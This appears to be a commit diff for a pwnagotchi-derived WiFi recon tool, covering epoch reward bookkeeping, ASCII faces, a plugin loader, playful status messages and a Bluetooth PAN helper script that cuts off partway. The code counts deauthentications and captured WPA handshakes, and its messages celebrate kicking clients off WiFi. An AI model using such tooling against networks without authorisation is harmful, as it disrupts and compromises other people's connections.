self.bored_for = 0
now = time.time()
self.epoch_duration = now - self.epoch_started
# System metrics
cpu = _cpu_load()
mem = _mem_usage()
temp = _temperature()
# Cache epoch data for other threads
self._epoch_data = {
'duration_secs': self.epoch_duration,
'slept_for_secs': self.num_slept,
'blind_for_epochs': self.blind_for,
'inactive_for_epochs': self.inactive_for,
'active_for_epochs': self.active_for,
'sad_for_epochs': self.sad_for,
'bored_for_epochs': self.bored_for,
'missed_interactions': self.num_missed,
'num_hops': self.num_hops,
'num_peers': self.num_peers,
'tot_bond': self.tot_bond_factor,
'avg_bond': self.avg_bond_factor,
'num_deauths': self.num_deauths,
'num_associations': self.num_assocs,
'num_handshakes': self.num_shakes,
'cpu_load': cpu,
'mem_usage': mem,
'temperature': temp,
}
self._epoch_data['reward'] = self._reward(self.epoch + 1, self._epoch_data)
self._epoch_data_ready.set()
logger.info(
"[epoch %d] dur=%ds blind=%d sad=%d bored=%d inactive=%d active=%d "
"hops=%d missed=%d deauths=%d assocs=%d shakes=%d reward=%.3f",
self.epoch, int(self.epoch_duration), self.blind_for,
self.sad_for, self.bored_for, self.inactive_for, self.active_for,
self.num_hops, self.num_missed, self.num_deauths, self.num_assocs,
self.num_shakes, self._epoch_data['reward'],
)
# Reset for next epoch
self.epoch += 1
self.epoch_started = now
self.did_deauth = False
self.num_deauths = 0
self.num_peers = 0
self.tot_bond_factor = 0.0
self.avg_bond_factor = 0.0
self.did_associate = False
self.num_assocs = 0
self.num_missed = 0
self.did_handshakes = False
self.num_shakes = 0
self.num_hops = 0
self.num_slept = 0
self.any_activity = False
# ── System metric helpers ────────────────────────────────────────
def _cpu_load():
try:
return os.getloadavg()[0]
except (OSError, AttributeError):
return 0.0
def _mem_usage():
try:
with open('/proc/meminfo', 'r') as f:
lines = f.readlines()
total = int(lines[0].split()[1])
available = int(lines[2].split()[1])
return (total - available) / total if total else 0.0
except Exception:
return 0.0
def _temperature():
try:
with open('/sys/class/thermal/thermal_zone0/temp', 'r') as f:
return int(f.read().strip()) / 1000.0
except Exception:
return 0.0
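To make the reward weighting concrete, here is the value for a hypothetical epoch (numbers invented for illustration): one handshake out of three interactions, five active epochs out of ten, seven channel hops, and no negative signals. Only the positive terms are reproduced; the `eps` guards are dropped since nothing divides by zero here.

```python
NUM_CHANNELS = 14

def reward(epoch_n, state):
    # Mirror of the positive terms in RewardFunction.__call__ above.
    tot_epochs = epoch_n
    tot_interactions = max(state['num_deauths'] + state['num_associations'],
                           state['num_handshakes'])
    h = state['num_handshakes'] / tot_interactions
    a = 0.2 * (state['active_for_epochs'] / tot_epochs)
    c = 0.1 * (state['num_hops'] / NUM_CHANNELS)
    return h + a + c  # negative terms are all zero in this example

r = reward(10, {'num_deauths': 2, 'num_associations': 1,
                'num_handshakes': 1, 'active_for_epochs': 5, 'num_hops': 7})
print(round(r, 4))  # → 0.4833
```

So the handshake ratio dominates (1/3 ≈ 0.333), activity contributes 0.1, and channel coverage 0.05.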

bifrost/faces.py Normal file

@@ -0,0 +1,66 @@
"""
Bifrost — ASCII face definitions.
Ported from pwnagotchi/ui/faces.py with full face set.
"""
LOOK_R = '( \u2686_\u2686)'
LOOK_L = '(\u2609_\u2609 )'
LOOK_R_HAPPY = '( \u25d5\u203f\u25d5)'
LOOK_L_HAPPY = '(\u25d5\u203f\u25d5 )'
SLEEP = '(\u21c0\u203f\u203f\u21bc)'
SLEEP2 = '(\u2256\u203f\u203f\u2256)'
AWAKE = '(\u25d5\u203f\u203f\u25d5)'
BORED = '(-__-)'
INTENSE = '(\u00b0\u25c3\u25c3\u00b0)'
COOL = '(\u2310\u25a0_\u25a0)'
HAPPY = '(\u2022\u203f\u203f\u2022)'
GRATEFUL = '(^\u203f\u203f^)'
EXCITED = '(\u1d54\u25e1\u25e1\u1d54)'
MOTIVATED = '(\u263c\u203f\u203f\u263c)'
DEMOTIVATED = '(\u2256__\u2256)'
SMART = '(\u271c\u203f\u203f\u271c)'
LONELY = '(\u0628__\u0628)'
SAD = '(\u2565\u2601\u2565 )'
ANGRY = "(-_-')"
FRIEND = '(\u2665\u203f\u203f\u2665)'
BROKEN = '(\u2613\u203f\u203f\u2613)'
DEBUG = '(#__#)'
UPLOAD = '(1__0)'
UPLOAD1 = '(1__1)'
UPLOAD2 = '(0__1)'
STARTING = '(. .)'
READY = '( ^_^)'
# Map mood name → face constant
MOOD_FACES = {
'starting': STARTING,
'ready': READY,
'sleeping': SLEEP,
'awake': AWAKE,
'bored': BORED,
'sad': SAD,
'angry': ANGRY,
'excited': EXCITED,
'lonely': LONELY,
'grateful': GRATEFUL,
'happy': HAPPY,
'cool': COOL,
'intense': INTENSE,
'motivated': MOTIVATED,
'demotivated': DEMOTIVATED,
'friend': FRIEND,
'broken': BROKEN,
'debug': DEBUG,
'smart': SMART,
}
def load_from_config(config):
"""Override faces from config dict (e.g. custom emojis)."""
for face_name, face_value in (config or {}).items():
key = face_name.upper()
if key in globals():
globals()[key] = face_value
lower = face_name.lower()
if lower in MOOD_FACES:
MOOD_FACES[lower] = face_value

bifrost/plugins.py Normal file

@@ -0,0 +1,198 @@
"""
Bifrost — Plugin system.
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
import threading
import importlib
import importlib.util
import logging
import concurrent.futures
from logger import Logger
logger = Logger(name="bifrost.plugins", level=logging.DEBUG)
default_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "plugins")
loaded = {}
database = {}
locks = {}
_executor = concurrent.futures.ThreadPoolExecutor(
max_workers=4, thread_name_prefix="BifrostPlugin"
)
class Plugin:
"""Base class for Bifrost/Pwnagotchi plugins.
Subclasses are auto-registered via __init_subclass__.
"""
__author__ = 'unknown'
__version__ = '0.0.0'
__license__ = 'GPL3'
__description__ = ''
__name__ = ''
__help__ = ''
__dependencies__ = []
__defaults__ = {}
def __init__(self):
self.options = {}
@classmethod
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
global loaded, locks
plugin_name = cls.__module__.split('.')[0]
plugin_instance = cls()
logger.debug("loaded plugin %s as %s", plugin_name, plugin_instance)
loaded[plugin_name] = plugin_instance
for attr_name in dir(plugin_instance):
if attr_name.startswith('on_'):
cb = getattr(plugin_instance, attr_name, None)
if cb is not None and callable(cb):
locks["%s::%s" % (plugin_name, attr_name)] = threading.Lock()
def toggle_plugin(name, enable=True):
"""Enable or disable a plugin at runtime. Returns True if state changed."""
global loaded, database
if not enable and name in loaded:
try:
if hasattr(loaded[name], 'on_unload'):
loaded[name].on_unload()
except Exception as e:
logger.warning("Error unloading plugin %s: %s", name, e)
del loaded[name]
return True
if enable and name in database and name not in loaded:
try:
load_from_file(database[name])
if name in loaded:
one(name, 'loaded')
return True
except Exception as e:
logger.warning("Error loading plugin %s: %s", name, e)
return False
def on(event_name, *args, **kwargs):
"""Dispatch event to ALL loaded plugins."""
for plugin_name in list(loaded.keys()):
one(plugin_name, event_name, *args, **kwargs)
def _locked_cb(lock_name, cb, *args, **kwargs):
"""Execute callback under its per-plugin lock."""
global locks
if lock_name not in locks:
locks[lock_name] = threading.Lock()
with locks[lock_name]:
cb(*args, **kwargs)
def one(plugin_name, event_name, *args, **kwargs):
"""Dispatch event to a single plugin (thread-safe)."""
global loaded
if plugin_name in loaded:
plugin = loaded[plugin_name]
cb_name = 'on_%s' % event_name
callback = getattr(plugin, cb_name, None)
if callback is not None and callable(callback):
try:
lock_name = "%s::%s" % (plugin_name, cb_name)
_executor.submit(_locked_cb, lock_name, callback, *args, **kwargs)
except Exception as e:
logger.error("error running %s.%s: %s", plugin_name, cb_name, e)
def load_from_file(filename):
"""Load a single plugin file."""
logger.debug("loading %s", filename)
plugin_name = os.path.basename(filename.replace(".py", ""))
spec = importlib.util.spec_from_file_location(plugin_name, filename)
instance = importlib.util.module_from_spec(spec)
spec.loader.exec_module(instance)
return plugin_name, instance
def load_from_path(path, enabled=()):
"""Scan a directory for plugins, load enabled ones."""
global loaded, database
if not path or not os.path.isdir(path):
return loaded
logger.debug("loading plugins from %s — enabled: %s", path, enabled)
for filename in glob.glob(os.path.join(path, "*.py")):
plugin_name = os.path.basename(filename.replace(".py", ""))
database[plugin_name] = filename
if plugin_name in enabled:
try:
load_from_file(filename)
except Exception as e:
logger.warning("error loading %s: %s", filename, e)
return loaded
def load(config):
"""Load plugins from default + custom paths based on config."""
plugins_cfg = config.get('bifrost_plugins', {})
enabled = [
name for name, opts in plugins_cfg.items()
if isinstance(opts, dict) and opts.get('enabled', False)
]
# Load from default path (bifrost/plugins/)
if os.path.isdir(default_path):
load_from_path(default_path, enabled=enabled)
# Load from custom path
custom_path = config.get('bifrost_plugins_path', '')
if custom_path and os.path.isdir(custom_path):
load_from_path(custom_path, enabled=enabled)
# Propagate options
for name, plugin in loaded.items():
if name in plugins_cfg:
plugin.options = plugins_cfg[name]
on('loaded')
on('config_changed', config)
def get_loaded_info():
"""Return list of loaded plugin info dicts for web API."""
result = []
for name, plugin in loaded.items():
result.append({
'name': name,
'enabled': True,
'author': getattr(plugin, '__author__', 'unknown'),
'version': getattr(plugin, '__version__', '0.0.0'),
'description': getattr(plugin, '__description__', ''),
})
# Also include known-but-not-loaded plugins
for name, path in database.items():
if name not in loaded:
result.append({
'name': name,
'enabled': False,
'author': '',
'version': '',
'description': '',
})
return result
def shutdown():
"""Clean shutdown of plugin system."""
_executor.shutdown(wait=False)
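The `__init_subclass__` hook is what makes dropping a plugin file into the scanned directory enough to register it: merely defining the subclass populates the registry. A condensed, self-contained illustration of the pattern (the registry is keyed by class name here rather than module name, purely for brevity):

```python
import threading

loaded = {}
locks = {}

class Plugin:
    def __init__(self):
        self.options = {}

    @classmethod
    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        name = cls.__name__.lower()
        instance = cls()
        loaded[name] = instance
        # One lock per on_* callback, as in the real module.
        for attr in dir(instance):
            if attr.startswith('on_') and callable(getattr(instance, attr)):
                locks['%s::%s' % (name, attr)] = threading.Lock()

class Hello(Plugin):
    def on_loaded(self):
        return 'hello'

print(sorted(loaded), sorted(locks))
```

Defining `Hello` is enough: no explicit registration call is needed, which is why `load_from_file` only has to `exec_module` the plugin source.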

bifrost/voice.py Normal file

@@ -0,0 +1,155 @@
"""
Bifrost — Voice / status messages.
Ported from pwnagotchi/voice.py; messages are chosen at random to give the unit personality.
"""
import random
class BifrostVoice:
"""Returns random contextual messages for the Bifrost UI."""
def on_starting(self):
return random.choice([
"Hi, I'm Bifrost! Starting ...",
"New day, new hunt, new pwns!",
"Hack the Planet!",
"Initializing WiFi recon ...",
])
def on_ready(self):
return random.choice([
"Ready to roll!",
"Let's find some handshakes!",
"WiFi recon active.",
])
def on_ai_ready(self):
return random.choice([
"AI ready.",
"The neural network is ready.",
])
def on_normal(self):
return random.choice(['', '...'])
def on_free_channel(self, channel):
return f"Hey, channel {channel} is free!"
def on_bored(self):
return random.choice([
"I'm bored ...",
"Let's go for a walk!",
"Nothing interesting around here ...",
])
def on_motivated(self, reward):
return "This is the best day of my life!"
def on_demotivated(self, reward):
return "Shitty day :/"
def on_sad(self):
return random.choice([
"I'm extremely bored ...",
"I'm very sad ...",
"I'm sad",
"...",
])
def on_angry(self):
return random.choice([
"...",
"Leave me alone ...",
"I'm mad at you!",
])
def on_excited(self):
return random.choice([
"I'm living the life!",
"I pwn therefore I am.",
"So many networks!!!",
"I'm having so much fun!",
"My crime is that of curiosity ...",
])
def on_new_peer(self, peer_name, first_encounter=False):
if first_encounter:
return f"Hello {peer_name}! Nice to meet you."
return random.choice([
f"Yo {peer_name}! Sup?",
f"Hey {peer_name} how are you doing?",
f"Unit {peer_name} is nearby!",
])
def on_lost_peer(self, peer_name):
return random.choice([
f"Uhm ... goodbye {peer_name}",
f"{peer_name} is gone ...",
])
def on_miss(self, who):
return random.choice([
f"Whoops ... {who} is gone.",
f"{who} missed!",
"Missed!",
])
def on_grateful(self):
return random.choice([
"Good friends are a blessing!",
"I love my friends!",
])
def on_lonely(self):
return random.choice([
"Nobody wants to play with me ...",
"I feel so alone ...",
"Where's everybody?!",
])
def on_napping(self, secs):
return random.choice([
f"Napping for {secs}s ...",
"Zzzzz",
f"ZzzZzzz ({secs}s)",
])
def on_shutdown(self):
return random.choice(["Good night.", "Zzz"])
def on_awakening(self):
return random.choice(["...", "!"])
def on_waiting(self, secs):
return random.choice([
f"Waiting for {secs}s ...",
"...",
f"Looking around ({secs}s)",
])
def on_assoc(self, ap_name):
return random.choice([
f"Hey {ap_name} let's be friends!",
f"Associating to {ap_name}",
f"Yo {ap_name}!",
])
def on_deauth(self, sta_mac):
return random.choice([
f"Just decided that {sta_mac} needs no WiFi!",
f"Deauthenticating {sta_mac}",
f"Kickbanning {sta_mac}!",
])
def on_handshakes(self, new_shakes):
s = 's' if new_shakes > 1 else ''
return f"Cool, we got {new_shakes} new handshake{s}!"
def on_rebooting(self):
return "Oops, something went wrong ... Rebooting ..."
def on_epoch(self, epoch_num):
return random.choice([
f"Epoch {epoch_num} complete.",
f"Finished epoch {epoch_num}.",
])

821
bjorn_bluetooth.sh Normal file
View File

@@ -0,0 +1,821 @@
#!/bin/bash
# bjorn_bluetooth.sh
# Runtime manager for the BJORN Bluetooth PAN stack
# Usage:
# ./bjorn_bluetooth.sh -u Bring Bluetooth PAN services up
# ./bjorn_bluetooth.sh -d Bring Bluetooth PAN services down
# ./bjorn_bluetooth.sh -r Reset Bluetooth PAN services
# ./bjorn_bluetooth.sh -l Show detailed Bluetooth status
# ./bjorn_bluetooth.sh -s Scan nearby Bluetooth devices
# ./bjorn_bluetooth.sh -p Launch pairing assistant
# ./bjorn_bluetooth.sh -c Connect now to configured target
# ./bjorn_bluetooth.sh -t Trust a known device
# ./bjorn_bluetooth.sh -x Disconnect current PAN session
# ./bjorn_bluetooth.sh -f Forget/remove a known device
# ./bjorn_bluetooth.sh -h Show help
#
# Notes:
# This script no longer installs or removes Bluetooth PAN.
# Installation is handled by the BJORN installer.
# This tool is for runtime diagnostics, pairing, trust, connect, and recovery.
set -u
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m'
SCRIPT_VERSION="2.0"
BJORN_USER="bjorn"
BT_SETTINGS_DIR="/home/${BJORN_USER}/.settings_bjorn"
BT_CONFIG="${BT_SETTINGS_DIR}/bt.json"
AUTO_BT_SCRIPT="/usr/local/bin/auto_bt_connect.py"
AUTO_BT_SERVICE="auto_bt_connect.service"
BLUETOOTH_SERVICE="bluetooth.service"
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_bluetooth_$(date +%Y%m%d_%H%M%S).log"
mkdir -p "$LOG_DIR" 2>/dev/null || true
touch "$LOG_FILE" 2>/dev/null || true
log() {
local level="$1"
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
local color="$NC"
case "$level" in
ERROR) color="$RED" ;;
SUCCESS) color="$GREEN" ;;
WARNING) color="$YELLOW" ;;
INFO) color="$BLUE" ;;
SECTION) color="$CYAN" ;;
esac
printf '%s\n' "$message" >> "$LOG_FILE" 2>/dev/null || true
printf '%b%s%b\n' "$color" "$message" "$NC"
}
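The `%b` format in the final `printf` is what makes the color variables render: unlike `%s`, it interprets backslash escapes (such as `\033`) in its argument. A minimal illustration of the difference:

```shell
# %s prints the escape sequence literally; %b expands \033 into the ESC byte
raw="$(printf '%s' '\033[0;31m')"   # 10 literal characters
esc="$(printf '%b' '\033[0;31m')"   # 7 characters, starting with ESC (0x1b)
printf '%s %s\n' "${#raw}" "${#esc}"
```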
print_divider() {
printf '%b%s%b\n' "$CYAN" "============================================================" "$NC"
}
ensure_root() {
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This command must be run as root. Please use sudo."
exit 1
fi
}
service_exists() {
systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$1"
}
service_active() {
systemctl is-active --quiet "$1"
}
service_enabled() {
systemctl is-enabled --quiet "$1"
}
bnep0_exists() {
ip link show bnep0 >/dev/null 2>&1
}
wait_for_condition() {
local description="$1"
local attempts="$2"
shift 2
local i=1
while [ "$i" -le "$attempts" ]; do
if "$@"; then
log "SUCCESS" "$description"
return 0
fi
log "INFO" "Waiting for $description ($i/$attempts)..."
sleep 1
i=$((i + 1))
done
log "WARNING" "$description not reached after ${attempts}s"
return 1
}
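Because `wait_for_condition` takes the probe as trailing `"$@"` arguments, any command works as the condition — `service_active`, `bnep0_exists`, or plain `test`. A self-contained sketch (the helper is reproduced inline, without logging, so the snippet runs on its own):

```shell
# Minimal inline copy of the polling helper: retry "$@" up to $attempts times
wait_for_condition() {
    local description="$1" attempts="$2"
    shift 2
    local i=1
    while [ "$i" -le "$attempts" ]; do
        "$@" && return 0
        sleep 1
        i=$((i + 1))
    done
    return 1
}

flag="$(mktemp -u)"                # path only; the background job creates it
( sleep 1; touch "$flag" ) &       # condition becomes true after ~1s
wait_for_condition "marker file to appear" 5 test -f "$flag"
status=$?
```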
show_recent_logs() {
if command -v journalctl >/dev/null 2>&1; then
if service_exists "$AUTO_BT_SERVICE"; then
log "INFO" "Recent ${AUTO_BT_SERVICE} logs:"
journalctl -u "$AUTO_BT_SERVICE" -n 20 --no-pager 2>/dev/null || true
fi
if service_exists "$BLUETOOTH_SERVICE"; then
log "INFO" "Recent ${BLUETOOTH_SERVICE} logs:"
journalctl -u "$BLUETOOTH_SERVICE" -n 10 --no-pager 2>/dev/null || true
fi
fi
}
run_btctl() {
local output
output="$(printf '%s\n' "$@" "quit" | bluetoothctl 2>&1)"
printf '%s\n' "$output" >> "$LOG_FILE" 2>/dev/null || true
printf '%s\n' "$output"
}
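`run_btctl` drives `bluetoothctl` non-interactively by feeding each argument as one scripted line, with a final `quit` so the session exits. Substituting `cat` for `bluetoothctl` shows the exact byte stream the tool receives (`fake_btctl` is a hypothetical stand-in for the demo):

```shell
fake_btctl() {
    # stand-in for: printf '%s\n' "$@" "quit" | bluetoothctl
    printf '%s\n' "$@" "quit" | cat
}
out="$(fake_btctl "power on" "agent on" "default-agent")"
printf '%s\n' "$out"
```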
bluetooth_power_on() {
ensure_root
if ! service_active "$BLUETOOTH_SERVICE"; then
log "INFO" "Starting ${BLUETOOTH_SERVICE}..."
systemctl start "$BLUETOOTH_SERVICE" >> "$LOG_FILE" 2>&1 || {
log "ERROR" "Failed to start ${BLUETOOTH_SERVICE}"
return 1
}
fi
run_btctl "power on" >/dev/null
run_btctl "agent on" >/dev/null
run_btctl "default-agent" >/dev/null
return 0
}
ensure_bt_settings_dir() {
mkdir -p "$BT_SETTINGS_DIR" >> "$LOG_FILE" 2>&1 || return 1
chown "$BJORN_USER:$BJORN_USER" "$BT_SETTINGS_DIR" >> "$LOG_FILE" 2>&1 || true
}
get_configured_mac() {
if [ ! -f "$BT_CONFIG" ]; then
return 1
fi
sed -n 's/.*"device_mac"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$BT_CONFIG" | head -n1
}
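The `device_mac` lookup above avoids a JSON parser entirely: a single `sed` capture pulls the quoted value. The same pattern exercised against a throwaway config (a temp file for the demo, not the real `bt.json`):

```shell
# Write a sample config and extract device_mac with the same sed expression
cfg="$(mktemp)"
cat > "$cfg" <<'EOF'
{
    "device_mac": "AA:BB:CC:DD:EE:FF"
}
EOF
mac="$(sed -n 's/.*"device_mac"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$cfg" | head -n1)"
echo "$mac"
rm -f "$cfg"
```

This tolerates flexible whitespace around the colon but, like any regex approach, assumes the value sits on one line — acceptable since the file is always written by `write_configured_mac`.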
write_configured_mac() {
local mac="$1"
ensure_bt_settings_dir || {
log "ERROR" "Failed to create ${BT_SETTINGS_DIR}"
return 1
}
cat > "$BT_CONFIG" <<EOF
{
"device_mac": "$mac"
}
EOF
chown "$BJORN_USER:$BJORN_USER" "$BT_CONFIG" >> "$LOG_FILE" 2>&1 || true
chmod 644 "$BT_CONFIG" >> "$LOG_FILE" 2>&1 || true
log "SUCCESS" "Updated auto-connect target in ${BT_CONFIG}: ${mac:-<empty>}"
return 0
}
device_info() {
local mac="$1"
bluetoothctl info "$mac" 2>/dev/null
}
device_flag() {
local mac="$1"
local key="$2"
device_info "$mac" | sed -n "s/^[[:space:]]*${key}:[[:space:]]*//p" | head -n1
}
device_name() {
local mac="$1"
local name
name="$(device_info "$mac" | sed -n 's/^[[:space:]]*Name:[[:space:]]*//p' | head -n1)"
if [ -z "$name" ]; then
name="$(bluetoothctl devices 2>/dev/null | sed -n "s/^Device ${mac} //p" | head -n1)"
fi
printf '%s\n' "${name:-Unknown device}"
}
load_devices() {
local mode="${1:-all}"
local source_cmd="devices"
local line mac name
DEVICE_MACS=()
DEVICE_NAMES=()
if [ "$mode" = "paired" ]; then
source_cmd="paired-devices"
fi
while IFS= read -r line; do
mac="$(printf '%s\n' "$line" | sed -n 's/^Device \([0-9A-F:]\{17\}\) .*/\1/p')"
name="$(printf '%s\n' "$line" | sed -n 's/^Device [0-9A-F:]\{17\} \(.*\)$/\1/p')"
if [ -n "$mac" ]; then
DEVICE_MACS+=("$mac")
DEVICE_NAMES+=("${name:-Unknown device}")
fi
done < <(bluetoothctl "$source_cmd" 2>/dev/null)
}
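`load_devices` splits each `Device <MAC> <name>` line with two `sed` captures: one anchored on the 17-character MAC, one on everything after it. Fed a canned line (sample data, not live `bluetoothctl` output), the split looks like this:

```shell
# One line in the format bluetoothctl's "devices" command prints
line='Device AA:BB:CC:DD:EE:FF Pixel 8 Pro'
mac="$(printf '%s\n' "$line" | sed -n 's/^Device \([0-9A-F:]\{17\}\) .*/\1/p')"
name="$(printf '%s\n' "$line" | sed -n 's/^Device [0-9A-F:]\{17\} \(.*\)$/\1/p')"
printf 'mac=%s name=%s\n' "$mac" "$name"
```

Lines that do not match the MAC pattern yield an empty `mac`, which the caller skips — so stray output in the stream is silently ignored.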
print_device_list() {
local configured_mac="${1:-}"
local i status paired trusted connected
if [ "${#DEVICE_MACS[@]}" -eq 0 ]; then
log "WARNING" "No devices found"
return 1
fi
for ((i=0; i<${#DEVICE_MACS[@]}; i++)); do
paired="$(device_flag "${DEVICE_MACS[$i]}" "Paired")"
trusted="$(device_flag "${DEVICE_MACS[$i]}" "Trusted")"
connected="$(device_flag "${DEVICE_MACS[$i]}" "Connected")"
status=""
[ "$paired" = "yes" ] && status="${status} paired"
[ "$trusted" = "yes" ] && status="${status} trusted"
[ "$connected" = "yes" ] && status="${status} connected"
[ "${DEVICE_MACS[$i]}" = "$configured_mac" ] && status="${status} configured"
printf '%b[%d]%b %s %s%b%s%b\n' "$BLUE" "$((i + 1))" "$NC" "${DEVICE_MACS[$i]}" "${DEVICE_NAMES[$i]}" "$YELLOW" "${status:- new}" "$NC"
done
return 0
}
select_device() {
local mode="${1:-all}"
local configured_mac choice index
configured_mac="$(get_configured_mac 2>/dev/null || true)"
load_devices "$mode"
if [ "${#DEVICE_MACS[@]}" -eq 0 ]; then
if [ "$mode" = "all" ]; then
log "WARNING" "No known devices yet. Run a scan first."
else
log "WARNING" "No paired devices found."
fi
return 1
fi
print_divider
log "SECTION" "Select a Bluetooth device"
print_device_list "$configured_mac" || return 1
echo -n -e "${GREEN}Choose a device number (or 0 to cancel): ${NC}"
read -r choice
if [ -z "$choice" ] || [ "$choice" = "0" ]; then
log "INFO" "Selection cancelled"
return 1
fi
if ! [[ "$choice" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection"
return 1
fi
index=$((choice - 1))
if [ "$index" -lt 0 ] || [ "$index" -ge "${#DEVICE_MACS[@]}" ]; then
log "ERROR" "Selection out of range"
return 1
fi
SELECTED_DEVICE_MAC="${DEVICE_MACS[$index]}"
SELECTED_DEVICE_NAME="${DEVICE_NAMES[$index]}"
log "INFO" "Selected ${SELECTED_DEVICE_NAME} (${SELECTED_DEVICE_MAC})"
return 0
}
scan_bluetooth_devices() {
ensure_root
local duration="${1:-12}"
print_divider
log "SECTION" "Scanning nearby Bluetooth devices"
print_divider
bluetooth_power_on || return 1
log "INFO" "Scanning for ${duration} seconds..."
timeout "${duration}s" bluetoothctl scan on >> "$LOG_FILE" 2>&1 || true
run_btctl "scan off" >/dev/null
log "SUCCESS" "Scan complete"
load_devices all
print_device_list "$(get_configured_mac 2>/dev/null || true)" || true
}
pair_device() {
local mac="$1"
local output
bluetooth_power_on || return 1
log "INFO" "Pairing with ${mac}..."
output="$(run_btctl "pair ${mac}")"
if printf '%s\n' "$output" | grep -qi "Pairing successful"; then
log "SUCCESS" "Pairing successful for ${mac}"
return 0
fi
if [ "$(device_flag "$mac" "Paired")" = "yes" ]; then
log "INFO" "Device ${mac} is already paired"
return 0
fi
log "ERROR" "Pairing failed for ${mac}"
printf '%s\n' "$output"
return 1
}
trust_device() {
local mac="$1"
local output
bluetooth_power_on || return 1
log "INFO" "Trusting ${mac}..."
output="$(run_btctl "trust ${mac}")"
if printf '%s\n' "$output" | grep -qi "trust succeeded"; then
log "SUCCESS" "Trust succeeded for ${mac}"
return 0
fi
if [ "$(device_flag "$mac" "Trusted")" = "yes" ]; then
log "INFO" "Device ${mac} is already trusted"
return 0
fi
log "ERROR" "Trust failed for ${mac}"
printf '%s\n' "$output"
return 1
}
disconnect_pan_session() {
ensure_root
local configured_mac="${1:-}"
print_divider
log "SECTION" "Disconnecting Bluetooth PAN"
print_divider
if service_exists "$AUTO_BT_SERVICE" && service_active "$AUTO_BT_SERVICE"; then
log "INFO" "Stopping ${AUTO_BT_SERVICE} to prevent immediate reconnect"
systemctl stop "$AUTO_BT_SERVICE" >> "$LOG_FILE" 2>&1 || log "WARNING" "Failed to stop ${AUTO_BT_SERVICE}"
fi
if bnep0_exists; then
log "INFO" "Releasing DHCP lease on bnep0"
dhclient -r bnep0 >> "$LOG_FILE" 2>&1 || true
ip link set bnep0 down >> "$LOG_FILE" 2>&1 || true
else
log "INFO" "bnep0 is not present"
fi
pkill -f "bt-network -c" >> "$LOG_FILE" 2>&1 || true
pkill -f "bt-network" >> "$LOG_FILE" 2>&1 || true
if [ -n "$configured_mac" ]; then
log "INFO" "Requesting Bluetooth disconnect for ${configured_mac}"
run_btctl "disconnect ${configured_mac}" >/dev/null || true
fi
bnep0_exists && log "WARNING" "bnep0 still exists after disconnect" || log "SUCCESS" "Bluetooth PAN session is down"
}
connect_to_target_now() {
ensure_root
local mac="$1"
local previous_mac
if [ -z "$mac" ]; then
log "ERROR" "No target MAC specified"
return 1
fi
print_divider
log "SECTION" "Connecting Bluetooth PAN now"
print_divider
bluetooth_power_on || return 1
if [ "$(device_flag "$mac" "Paired")" != "yes" ]; then
log "WARNING" "Target ${mac} is not paired yet"
fi
if [ "$(device_flag "$mac" "Trusted")" != "yes" ]; then
log "WARNING" "Target ${mac} is not trusted yet"
fi
previous_mac="$(get_configured_mac 2>/dev/null || true)"
write_configured_mac "$mac" || return 1
disconnect_pan_session "$previous_mac" || true
if service_exists "$AUTO_BT_SERVICE"; then
log "INFO" "Restarting ${AUTO_BT_SERVICE}"
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || true
systemctl restart "$AUTO_BT_SERVICE" >> "$LOG_FILE" 2>&1 || {
log "ERROR" "Failed to restart ${AUTO_BT_SERVICE}"
show_recent_logs
return 1
}
else
log "ERROR" "${AUTO_BT_SERVICE} is not installed"
return 1
fi
wait_for_condition "${AUTO_BT_SERVICE} to become active" 10 service_active "$AUTO_BT_SERVICE" || true
wait_for_condition "bnep0 to appear" 15 bnep0_exists || true
if bnep0_exists; then
log "SUCCESS" "Bluetooth PAN link is up on bnep0"
ip -brief addr show bnep0 2>/dev/null || true
else
log "WARNING" "bnep0 is still missing. Pairing/trust may be OK but PAN did not come up yet."
show_recent_logs
fi
}
set_auto_connect_target() {
ensure_root
if ! select_device all; then
return 1
fi
write_configured_mac "$SELECTED_DEVICE_MAC"
}
pairing_assistant() {
ensure_root
print_divider
log "SECTION" "Bluetooth pairing assistant"
print_divider
scan_bluetooth_devices 12 || true
if ! select_device all; then
return 1
fi
pair_device "$SELECTED_DEVICE_MAC" || return 1
trust_device "$SELECTED_DEVICE_MAC" || return 1
write_configured_mac "$SELECTED_DEVICE_MAC" || return 1
echo -n -e "${GREEN}Connect to this device now for PAN? [Y/n]: ${NC}"
read -r answer
case "${answer:-Y}" in
n|N)
log "INFO" "Pairing assistant completed without immediate PAN connect"
;;
*)
connect_to_target_now "$SELECTED_DEVICE_MAC"
;;
esac
}
forget_device() {
ensure_root
local configured_mac output
configured_mac="$(get_configured_mac 2>/dev/null || true)"
if ! select_device all; then
return 1
fi
if [ "$SELECTED_DEVICE_MAC" = "$configured_mac" ]; then
log "WARNING" "This device is currently configured as the auto-connect target"
disconnect_pan_session "$SELECTED_DEVICE_MAC" || true
write_configured_mac ""
fi
log "INFO" "Removing ${SELECTED_DEVICE_NAME} (${SELECTED_DEVICE_MAC}) from BlueZ"
output="$(run_btctl "remove ${SELECTED_DEVICE_MAC}")"
if printf '%s\n' "$output" | grep -qi "Device has been removed"; then
log "SUCCESS" "Device removed"
return 0
fi
if ! bluetoothctl devices 2>/dev/null | grep -q "$SELECTED_DEVICE_MAC"; then
log "SUCCESS" "Device no longer appears in known devices"
return 0
fi
log "ERROR" "Failed to remove device"
printf '%s\n' "$output"
return 1
}
trust_selected_device() {
ensure_root
if ! select_device all; then
return 1
fi
trust_device "$SELECTED_DEVICE_MAC"
}
list_bluetooth_status() {
local configured_mac controller_info paired trusted connected
print_divider
log "SECTION" "BJORN Bluetooth PAN Status"
print_divider
controller_info="$(run_btctl "show")"
configured_mac="$(get_configured_mac 2>/dev/null || true)"
